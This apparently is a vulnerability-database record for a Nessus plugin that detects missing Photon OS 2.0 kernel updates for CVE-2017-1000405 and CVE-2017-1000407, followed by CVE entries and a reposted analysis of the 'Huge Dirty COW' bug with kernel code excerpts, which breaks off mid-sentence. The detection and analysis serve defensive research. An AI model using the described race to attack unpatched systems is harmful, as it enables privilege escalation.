ID PHOTONOS_PHSA-2017-2_0-0008_LINUX.NASL Type nessus Reporter This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2021-01-02T00:00:00
Description
An update of the linux package has been released.
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from VMware Security Advisory PHSA-2017-2.0-0008. The text
# itself is copyright (C) VMware, Inc.
include("compat.inc");
if (description)
{
  # Registration branch: the engine runs this part to collect plugin
  # metadata and leaves via exit(0) before any host interaction below.
  script_id(121792);
  script_version("1.3");
  script_cvs_date("Date: 2019/04/02 21:54:17");

  script_cve_id("CVE-2017-1000405", "CVE-2017-1000407");

  script_name(english:"Photon OS 2.0: Linux PHSA-2017-2.0-0008");
  script_summary(english:"Checks the rpm output for the updated packages.");

  script_set_attribute(attribute:"synopsis", value:"The remote PhotonOS host is missing multiple security updates.");
  script_set_attribute(attribute:"description", value:"An update of the linux package has been released.");
  script_set_attribute(attribute:"see_also", value:"https://github.com/vmware/photon/wiki/Security-Updates-2-8.md");
  script_set_attribute(attribute:"solution", value:"Update the affected Linux packages.");

  # Scores are those of CVE-2017-1000405, as declared by cvss_score_source.
  script_set_cvss_base_vector("CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-1000405");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/12/28");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/12/28");
  script_set_attribute(attribute:"plugin_publication_date", value:"2019/02/07");

  # Local (credentialed) check; both the package CPE and the OS CPE are declared.
  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:vmware:photonos:linux");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:vmware:photonos:2.0");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"PhotonOS Local Security Checks");

  script_copyright(english:"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  # The host checks below read exactly these KB keys, populated over SSH.
  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/PhotonOS/release", "Host/PhotonOS/rpm-list");

  exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
# Gate on the prerequisites for a credentialed PhotonOS 2.0 package check.
# Each audit() call reports why the host is out of scope and ends the scan
# for this plugin; the order determines which reason is reported.
if (!get_kb_item("Host/local_checks_enabled"))
{
  audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
}

release = get_kb_item("Host/PhotonOS/release");
is_photon = !isnull(release) && release =~ "^VMware Photon";
if (!is_photon)
{
  audit(AUDIT_OS_NOT, "PhotonOS");
}
# Accept both the "Linux" and "OS" product spellings, but only major 2.0.
is_photon_20 = release =~ "^VMware Photon (?:Linux|OS) 2\.0(\D|$)";
if (!is_photon_20)
{
  audit(AUDIT_OS_NOT, "PhotonOS 2.0");
}

if (!get_kb_item("Host/PhotonOS/rpm-list"))
{
  audit(AUDIT_PACKAGE_LIST_MISSING);
}

# Only x86 (32- or 64-bit) package references are listed in this plugin.
cpu = get_kb_item("Host/cpu");
if (isnull(cpu))
{
  audit(AUDIT_UNKNOWN_ARCH);
}
is_x86 = ("x86_64" >< cpu) || (cpu =~ "^i[3-6]86$");
if (!is_x86)
{
  audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "PhotonOS", cpu);
}
# Fixed package versions from PHSA-2017-2.0-0008: every kernel flavour and
# sub-package shipped at 4.9.71-1.ph2. rpm_check() counts a hit for each
# reference the host satisfies with an older installed version.
# NOTE(review): this compares the installed package version from the rpm
# list; whether the fixed kernel is the one currently running is not
# assessed here — confirm separately if that matters for your exposure window.
flag = 0;

fixed_pkgs = make_list(
  "linux-4.9.71-1.ph2",
  "linux-api-headers-4.9.71-1.ph2",
  "linux-debuginfo-4.9.71-1.ph2",
  "linux-devel-4.9.71-1.ph2",
  "linux-docs-4.9.71-1.ph2",
  "linux-drivers-gpu-4.9.71-1.ph2",
  "linux-esx-4.9.71-1.ph2",
  "linux-esx-debuginfo-4.9.71-1.ph2",
  "linux-esx-devel-4.9.71-1.ph2",
  "linux-esx-docs-4.9.71-1.ph2",
  "linux-oprofile-4.9.71-1.ph2",
  "linux-secure-4.9.71-1.ph2",
  "linux-secure-debuginfo-4.9.71-1.ph2",
  "linux-secure-devel-4.9.71-1.ph2",
  "linux-secure-docs-4.9.71-1.ph2",
  "linux-secure-lkcm-4.9.71-1.ph2",
  "linux-sound-4.9.71-1.ph2",
  "linux-tools-4.9.71-1.ph2"
);

foreach pkg_ref (fixed_pkgs)
{
  if (rpm_check(release:"PhotonOS-2.0", reference:pkg_ref)) flag++;
}
# Report when at least one listed package is behind the fixed version;
# otherwise distinguish "checked and current" from "package not installed".
if (!flag)
{
  tested = pkg_tests_get();
  if (tested)
  {
    audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  }
  else
  {
    audit(AUDIT_PACKAGE_NOT_INSTALLED, "linux");
  }
}
else
{
  # Local check: port 0. The extra text is the per-package comparison
  # accumulated by rpm_check().
  security_report_v4(port:0, severity:SECURITY_WARNING, extra:rpm_report_get());
  exit(0);
}
{"id": "PHOTONOS_PHSA-2017-2_0-0008_LINUX.NASL", "bulletinFamily": "scanner", "title": "Photon OS 2.0: Linux PHSA-2017-2.0-0008", "description": "An update of the linux package has been released.", "published": "2019-02-07T00:00:00", "modified": "2021-01-02T00:00:00", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/121792", "reporter": "This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://github.com/vmware/photon/wiki/Security-Updates-2-8.md"], "cvelist": ["CVE-2017-1000407", "CVE-2017-1000405"], "type": "nessus", "lastseen": "2021-01-01T01:07:04", "edition": 17, "viewCount": 8, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-1000405", "CVE-2017-1000407"]}, {"type": "seebug", "idList": ["SSV:96908"]}, {"type": "virtuozzo", "idList": ["VZA-2017-109", "VZA-2017-110", "VZA-2017-111", "VZA-2018-004"]}, {"type": "nessus", "idList": ["FEDORA_2017-B0C1F44130.NASL", "FEDORA_2017-9EA11E444D.NASL", "PHOTONOS_PHSA-2017-2_0-0008_WGET.NASL", "UBUNTU_USN-3511-1.NASL", "ORACLELINUX_ELSA-2018-4017.NASL", "ORACLEVM_OVMSA-2018-0012.NASL", "SUSE_SU-2017-3226-1.NASL", "VIRTUOZZO_VZA-2017-111.NASL", "UBUNTU_USN-3510-1.NASL", "VIRTUOZZO_VZA-2017-110.NASL"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:D8B1BFCB08D0FAA92CCBDBD01EF88A3F"]}, {"type": "exploitdb", "idList": ["EDB-ID:44305", "EDB-ID:43199"]}, {"type": "fedora", "idList": ["FEDORA:22E2B607603F", "FEDORA:3CCDE601B23D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310843396", "OPENVAS:1361412562310843398", "OPENVAS:1361412562310843400", "OPENVAS:1361412562310843403", "OPENVAS:1361412562310873860", "OPENVAS:1361412562310843394", "OPENVAS:1361412562310843397", "OPENVAS:1361412562310843402", "OPENVAS:1361412562310873857", "OPENVAS:1361412562310843393"]}, {"type": "oraclelinux", "idList": ["ELSA-2018-4017", "ELSA-2017-3651"]}, {"type": "suse", "idList": 
["SUSE-SU-2017:3319-1", "SUSE-SU-2017:3317-1", "SUSE-SU-2017:3300-1", "SUSE-SU-2017:3324-1", "SUSE-SU-2017:3285-1", "SUSE-SU-2017:3225-1", "SUSE-SU-2017:3314-1", "SUSE-SU-2017:3226-1", "SUSE-SU-2017:3297-1", "SUSE-SU-2017:3284-1"]}, {"type": "ubuntu", "idList": ["USN-3510-1", "USN-3510-2", "USN-3509-3", "USN-3511-1", "USN-3507-2", "USN-3509-2", "USN-3509-4", "USN-3508-2", "USN-3509-1", "USN-3508-1"]}, {"type": "redhat", "idList": ["RHSA-2018:0180", "RHSA-2019:1170"]}, {"type": "threatpost", "idList": ["THREATPOST:A28CC7C8B76DAF5EBFF24CE8575A2087"]}, {"type": "amazon", "idList": ["ALAS-2017-937", "ALAS2-2018-956", "ALAS-2018-956"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:0BD4290D520A235B05B93F0ACF4B7C2B", "CFOUNDRY:74EC63FE794662FC4DFD36709B39475A"]}], "modified": "2021-01-01T01:07:04", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-01-01T01:07:04", "rev": 2}, "vulnersScore": 7.5}, "sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-2.0-0008. 
The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121792);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/04/02 21:54:17\");\n\n script_cve_id(\"CVE-2017-1000405\", \"CVE-2017-1000407\");\n\n script_name(english:\"Photon OS 2.0: Linux PHSA-2017-2.0-0008\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the linux package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-8.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-1000405\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local 
Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 2.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-api-headers-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-debuginfo-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-devel-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-docs-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-drivers-gpu-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-debuginfo-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-devel-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-docs-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", 
reference:\"linux-oprofile-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-debuginfo-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-devel-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-docs-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-lkcm-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-sound-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-tools-4.9.71-1.ph2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux\");\n}\n", "naslFamily": "PhotonOS Local Security Checks", "pluginID": "121792", "cpe": ["p-cpe:/a:vmware:photonos:linux", "cpe:/o:vmware:photonos:2.0"], "scheme": null, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}}
{"cve": [{"lastseen": "2020-12-09T20:13:19", "description": "The Linux Kernel 2.6.32 and later are affected by a denial of service, by flooding the diagnostic port 0x80 an exception can be triggered leading to a kernel panic.", "edition": 18, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 4.0}, "published": "2017-12-11T21:29:00", "title": "CVE-2017-1000407", "type": "cve", "cwe": ["CWE-754"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 6.1, "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000407"], "modified": "2019-05-14T22:29:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server_tus:7.6", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:linux:linux_kernel:4.15", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.6", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/a:redhat:virtualization_host:4.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.6", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:debian:debian_linux:9.0"], 
"id": "CVE-2017-1000407", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000407", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:virtualization_host:4.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.15:rc1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.15:rc2:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2020-12-09T20:13:19", "description": "The Linux Kernel versions 2.6.38 through 4.14 have a problematic use of pmd_mkdirty() in the touch_pmd() function inside the THP implementation. touch_pmd() can be reached by get_user_pages(). In such case, the pmd will become dirty. This scenario breaks the new can_follow_write_pmd()'s logic - pmd can become dirty without going through a COW cycle. This bug is not as severe as the original \"Dirty cow\" because an ext4 file (or any other regular file) cannot be mapped using THP. Nevertheless, it does allow us to overwrite read-only huge pages. For example, the zero huge page and sealed shmem files can be overwritten (since their mapping can be populated using THP). 
Note that after the first write page-fault to the zero page, it will be replaced with a new fresh (and zeroed) thp.", "edition": 16, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-30T22:29:00", "title": "CVE-2017-1000405", "type": "cve", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000405"], "modified": "2018-02-13T02:29:00", "cpe": ["cpe:/o:linux:linux_kernel:4.14"], "id": "CVE-2017-1000405", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000405", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.14:*:*:*:*:*:*:*"]}], "seebug": [{"lastseen": "2017-12-25T18:30:18", "description": "The \u201cDirty COW\u201d vulnerability ([CVE-2016\u20135195](https://medium.com/r/?url=https%3A%2F%2Fcve.mitre.org%2Fcgi-bin%2Fcvename.cgi%3Fname%3DCVE-2016-5195)) is one of the most hyped and branded vulnerabilities published. Every Linux version from the last decade, including Android, desktops and servers was vulnerable. 
The impact was vast\u200a\u2014\u200amillions of users could be compromised easily and reliably, bypassing common exploit defenses.\r\n\r\nPlenty of information was published about the vulnerability, but its patch was not analyzed in detail.\r\n\r\nWe at Bindecy were interested to study the patch and all of its implications. Surprisingly, despite the enormous publicity the bug had received, we discovered that the patch was incomplete.\r\n\r\n### \"Dirty COW\" recap\r\nFirst, we need a full understanding of the original Dirty COW exploit. We\u2019ll assume basic understanding of the Linux memory manager. We won\u2019t recover the original gory details, as talented people have [already done](https://medium.com/r/?url=https%3A%2F%2Fchao-tic.github.io%2Fblog%2F2017%2F05%2F24%2Fdirty-cow) so.\r\n\r\nThe original vulnerability was in the `get_user_pages` function. This function is used to get the physical pages behind virtual addresses in user processes. The caller has to specify what kind of actions he intends to perform on these pages (touch, write, lock, etc\u2026), so the memory manager could prepare the pages accordingly. Specifically, when planning to perform a write action on a page inside a private mapping, the page may need to go through a COW (Copy-On-Write) cycle\u200a\u2014\u200athe original, \u201cread-only\u201d page is copied to a new page which is writable. 
The original page could be \u201cprivileged\u201d\u200a\u2014\u200ait could be mapped in other processes as well, and might even be written back to the disk after it\u2019s modified.\r\n\r\nLet\u2019s now take a look at the relevant code in `__get_user_pages`:\r\n```\r\n\r\nstatic long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,\r\n unsigned long start, unsigned long nr_pages,\r\n unsigned int gup_flags, struct page **pages,\r\n struct vm_area_struct **vmas, int *nonblocking)\r\n{\r\n // ...\r\n do {\r\n struct page *page;\r\n unsigned int foll_flags = gup_flags;\r\n // ...\r\n vma = find_extend_vma(mm, start);\r\n // ... \r\n \r\nretry:\r\n // ...\r\n cond_resched();\r\n page = follow_page_mask(vma, start, foll_flags, &page_mask);\r\n if (!page) {\r\n int ret;\r\n ret = faultin_page(tsk, vma, start, &foll_flags,\r\n nonblocking);\r\n switch (ret) {\r\n case 0:\r\n goto retry;\r\n case -EFAULT:\r\n case -ENOMEM:\r\n case -EHWPOISON:\r\n return i ? i : ret;\r\n case -EBUSY:\r\n return i;\r\n case -ENOENT:\r\n goto next_page;\r\n }\r\n BUG();\r\n }\r\n // ...\r\n \r\nnext_page:\r\n // ...\r\n nr_pages -= page_increm;\r\n } while (nr_pages);\r\n return i;\r\n}\r\n```\r\n\r\nThe `while` loop\u2019s goal is to fetch each page in the requested page range. Each page has to be faulted in until our requirements are satisfied\u200a\u2014\u200athat\u2019s what the `retry` label is used for.\r\n\r\n`follow_page_mask`\u2019s role is to scan the page tables to get the physical page for the given address (while taking into account the PTE permissions), or fail in case the request can\u2019t be satisfied. During `follow_page_mask`\u2019s operation the PTE\u2019s spinlock is acquired\u2014 this guarantees the physical page won\u2019t be released before we grab a reference.\r\n\r\n`faultin_page` requests the memory manager to handle the fault in the given address with the specified permissions (also under the PTE\u2019s spinlock). 
Note that after a successful call to `faultin_page` the lock is released\u200a\u2014\u200ait\u2019s not guaranteed that `follow_page_mask` will succeed in the next retry; another piece of code might have messed with our page.\r\n\r\nThe original vulnerable code resided at the end of faultin_page:\r\n```\r\nif ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))\r\n *flags &= ~FOLL_WRITE;\r\n```\r\n\r\nThe reason for removing the `FOLL_WRITE` flag is to take into account the case the `FOLL_FORCE` flag is applied on a read-only VMA (when the `VM_MAYWRITE` flag is set in the VMA). In that case, the `pte_maybe_mkwrite` function won\u2019t set the write bit, however the faulted-in page is indeed ready for writing.\r\n\r\nIf the page went through a COW cycle (marked by the `VM_FAULT_WRITE` flag) while performing faultin_page and the VMA is not writable, the `FOLL_WRITE flag` is removed from the next attempt to access the page\u200a\u2014\u200aonly read permissions will be requested.\r\n\r\nIf the first `follow_page_mask` fails because the page was read-only or not present, we\u2019ll try to fault it in. Now let\u2019s imagine that during that time, until the next attempt to get the page, we\u2019ll get rid of the COW version (e.g. by using `madvise(MADV_DONTNEED)`).\r\n\r\nThe next call to `faultin_page` will be made without the `FOLL_WRITE` flag, so we\u2019ll get the read-only version of the page from the page cache. Now, the next call to `follow_page_mask` will also happen without the `FOLL_WRITE` flag, so it will return the privileged read-only page\u200a\u2014\u200aas opposed to the caller\u2019s original request for a writable version of the page.\r\n\r\nBasically, the aforementioned flow is the Dirty COW vulnerability\u200a\u2014\u200ait allows us to write to the read-only privileged version of a page. 
The following fix was introduced in `faultin_page`:\r\n```\r\nif ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))\r\n *flags |= FOLL_COW; // Instead of *flags &= ~FOLL_WRITE;\r\n```\r\n\r\n\r\nAnd a new function, which is called by `follow_page_mask`, was added:\r\n```\r\n/*\r\n * FOLL_FORCE can write to even unwritable pte's, but only\r\n * after we've gone through a COW cycle and they are dirty.\r\n */\r\nstatic inline bool can_follow_write_pte(pte_t pte, unsigned int flags)\r\n{\r\n\treturn pte_write(pte) ||\r\n\t\t((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));\r\n}\r\n```\r\n\r\n\r\n\r\nInstead of reducing the requested permissions, `get_user_pages` now remembers the fact the we went through a COW cycle. On the next iteration, we would be able to get a read-only page for a write operation only if the `FOLL_FORCE` and `FOLL_COW` flags are specified, and that the PTE is marked as dirty.\r\n\r\nThis patch assumes that the read-only privileged copy of a page will never have a PTE pointing to it with the dirty bit on\u200a\u2014\u200aa reasonable assumption\u2026 or is it?\r\n\r\n### Transparent Huge Pages (THP)\r\nNormally, Linux usually uses a 4096-bytes long pages. In order to enable the system to manage large amounts of memory, we can either increase the number of page table entries, or use larger pages. We focus on the second method, which is implemented in Linux by using [huge pages](https://medium.com/r/?url=https%3A%2F%2Fgithub.com%2Florenzo-stoakes%2Flinux-vm-notes%2Fblob%2Fmaster%2Fsections%2Ftrans-huge-pages.md).\r\n\r\nA huge page is a 2MB long page. One of the ways to utilize this feature is through the Transparent Huge Pages mechanism. While there are other ways to get huge pages, they are outside of our scope.\r\n\r\nThe kernel will attempt to satisfy relevant memory allocations using huge pages. THP are swappable and \u201cbreakable\u201d (i.e. 
can be split into normal 4096-bytes pages), and can be used in anonymous, shmem and tmpfs mappings (the latter two are true only in newer kernel versions).\r\n\r\nUsually (depending on the compilation flags and the machine configuration) the default THP support is for anonymous mapping only. Shmem and tmpfs support can be turned on manually, and in general THP support can be turned on and off while the system is running by writing to some kernel\u2019s special files.\r\n\r\nAn important optimization opportunity is to coalesce normal pages into huge pages. A special daemon called khugepaged scans constantly for possible candidate pages that could be merged into huge pages. Obviously, to be a candidate, a VMA must cover a whole, aligned 2MB memory range.\r\n\r\nTHP is implemented by turning on the `_PAGE_PSE` bit of the PMD (Page Medium Directory, one level above the PTE level). The PMD thus points to a 2MB physical page, instead of a directory of PTEs. Each time the page tables are scanned, the PMDs must be checked with the `pmd_trans_huge` function, so we can decide whether the PMD points to a pfn or a directory of PTEs. On some architectures, huge PUDs (Page Upper Directory) exist as well, resulting in 1GB pages.\r\n\r\nTHP is supported since kernel 2.6.38. On most Android devices the THP subsystem is not enabled.\r\n\r\n### The bug\r\nDelving into the Dirty COW patch code that deals with THP, we can see that the same logic of `can_follow_write_pte` was applied to huge PMDs. 
A matching function called `can_follow_write_pm`d was added:\r\n```\r\nstatic inline bool can_follow_write_pmd(pmd_t pmd, unsigned int flags)\r\n{\r\n return pmd_write(pmd) ||\r\n ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pmd_dirty(pmd));\r\n}\r\n```\r\n\r\nHowever, in the huge PMD case, a page can be marked dirty without going through a COW cycle, using the `touch_pmd` function:\r\n```\r\nstatic void touch_pmd(struct vm_area_struct *vma, unsigned long addr,\r\n pmd_t *pmd)\r\n{\r\n pmd_t _pmd;\r\n\r\n /*\r\n * We should set the dirty bit only for FOLL_WRITE but for now\r\n * the dirty bit in the pmd is meaningless. And if the dirty\r\n * bit will become meaningful and we'll only set it with\r\n * FOLL_WRITE, an atomic set_bit will be required on the pmd to\r\n * set the young bit, instead of the current set_pmd_at.\r\n */\r\n _pmd = pmd_mkyoung(pmd_mkdirty(*pmd));\r\n if (pmdp_set_access_flags(vma, addr & HPAGE_PMD_MASK,\r\n pmd, _pmd, 1))\r\n update_mmu_cache_pmd(vma, addr, pmd);\r\n}\r\n```\r\n\r\n\r\n\r\nThis function is reached by 